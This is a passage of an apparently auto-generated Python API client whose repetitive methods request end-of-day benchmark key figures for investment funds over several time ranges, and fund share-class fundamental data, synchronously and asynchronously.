    return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[InlineResponse2002]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one month.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data
    wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[InlineResponse2002]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get_with_http_info_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one month.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data,
    HTTP status code and headers wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[(InlineResponse2002, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get(self, id, id_notation_benchmark, **kwargs) -> InlineResponse2002:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three months.  # noqa: E501

    Performs a synchronous HTTP request and returns only the response data.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2002: the response object.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get_with_http_info(self, id, id_notation_benchmark, **kwargs) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three months.  # noqa: E501

    Performs a synchronous HTTP request and returns the response data,
    the HTTP status code and the response headers.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2002: the response object.
        int: the HTTP status code.
        dict: the response headers.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[InlineResponse2002]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three months.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data
    wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[InlineResponse2002]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get_with_http_info_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three months.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data,
    HTTP status code and headers wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[(InlineResponse2002, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get(self, id, id_notation_benchmark, **kwargs) -> InlineResponse2003:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one week.  # noqa: E501

    Performs a synchronous HTTP request and returns only the response data.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2003: the response object.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get_with_http_info(self, id, id_notation_benchmark, **kwargs) -> typing.Tuple[InlineResponse2003, int, typing.MutableMapping]:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one week.  # noqa: E501

    Performs a synchronous HTTP request and returns the response data,
    the HTTP status code and the response headers.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2003: the response object.
        int: the HTTP status code.
        dict: the response headers.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[InlineResponse2003]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one week.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data
    wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[InlineResponse2003]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get_with_http_info_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[typing.Tuple[InlineResponse2003, int, typing.MutableMapping]]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one week.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data,
    HTTP status code and headers wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[(InlineResponse2003, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get(self, id, id_notation_benchmark, **kwargs) -> InlineResponse2002:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one year.  # noqa: E501

    Performs a synchronous HTTP request and returns only the response data.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2002: the response object.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get_with_http_info(self, id, id_notation_benchmark, **kwargs) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one year.  # noqa: E501

    Performs a synchronous HTTP request and returns the response data,
    the HTTP status code and the response headers.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2002: the response object.
        int: the HTTP status code.
        dict: the response headers.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get_async(self, id, id_notation_benchmark, **kwargs) -> "ApplyResult[InlineResponse2002]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one year.  # noqa: E501

    Performs an asynchronous HTTP request and returns the response data
    wrapped in an ApplyResult.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        ApplyResult[InlineResponse2002]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get_with_http_info_async(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one year.  # noqa: E501

    Asynchronous HTTP request. Returns an ApplyResult wrapping the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[(InlineResponse2002, int, typing.Dict)]
    """
    # Async flavour that keeps the full HTTP envelope: request the raw
    # (data, status, headers) triple and dispatch via the thread pool.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> InlineResponse2002:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three years.  # noqa: E501

    Synchronous HTTP request. Returns only the deserialized response body.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2002: Response object.
    """
    # Blocking flavour returning the body only; route the required
    # parameters through **kwargs as the generated Endpoint expects.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get_with_http_info(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three years.  # noqa: E501

    Synchronous HTTP request. Returns the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2002: Response object.
        int: HTTP status code.
        dict: Dictionary of the response headers.
    """
    # Blocking flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get_async(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> "ApplyResult[InlineResponse2002]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three years.  # noqa: E501

    Asynchronous HTTP request. Returns an ApplyResult wrapping only the
    deserialized response body.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[InlineResponse2002]
    """
    # Async flavour returning the body only, dispatched via the thread pool.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get_with_http_info_async(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of three years.  # noqa: E501

    Asynchronous HTTP request. Returns an ApplyResult wrapping the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[(InlineResponse2002, int, typing.Dict)]
    """
    # Async flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> InlineResponse2002:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of five years.  # noqa: E501

    Synchronous HTTP request. Returns only the deserialized response body.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2002: Response object.
    """
    # Blocking flavour returning the body only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get_with_http_info(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of five years.  # noqa: E501

    Synchronous HTTP request. Returns the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2002: Response object.
        int: HTTP status code.
        dict: Dictionary of the response headers.
    """
    # Blocking flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get_async(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> "ApplyResult[InlineResponse2002]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of five years.  # noqa: E501

    Asynchronous HTTP request. Returns an ApplyResult wrapping only the
    deserialized response body.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[InlineResponse2002]
    """
    # Async flavour returning the body only, dispatched via the thread pool.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get_with_http_info_async(
    self,
    id,
    id_notation_benchmark,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
    """End-of-day (EOD) benchmark key figures of a fund for the time range of five years.  # noqa: E501

    Asynchronous HTTP request. Returns an ApplyResult wrapping the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[(InlineResponse2002, int, typing.Dict)]
    """
    # Async flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get(
    self,
    id,
    **kwargs
) -> InlineResponse2006:
    """Fundamental data for a share class of a fund.  # noqa: E501

    The fundamental data comprises share class-specific data plus data that
    applies to the fund (and thus all its share classes). Instruments other
    than fund share classes yield empty values for those attributes. Dates
    are interpreted in the timezone of the fund company; see endpoint
    `/basic/region/country/list` for possible country values.

    Synchronous HTTP request. Returns only the deserialized response body.

    Args:
        id (str): Identifier of the instrument.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2006: Response object.
    """
    # Blocking flavour returning the body only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id)
    return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get_with_http_info(
    self,
    id,
    **kwargs
) -> typing.Tuple[InlineResponse2006, int, typing.MutableMapping]:
    """Fundamental data for a share class of a fund.  # noqa: E501

    The fundamental data comprises share class-specific data plus data that
    applies to the fund (and thus all its share classes). Instruments other
    than fund share classes yield empty values for those attributes. Dates
    are interpreted in the timezone of the fund company; see endpoint
    `/basic/region/country/list` for possible country values.

    Synchronous HTTP request. Returns the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the instrument.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
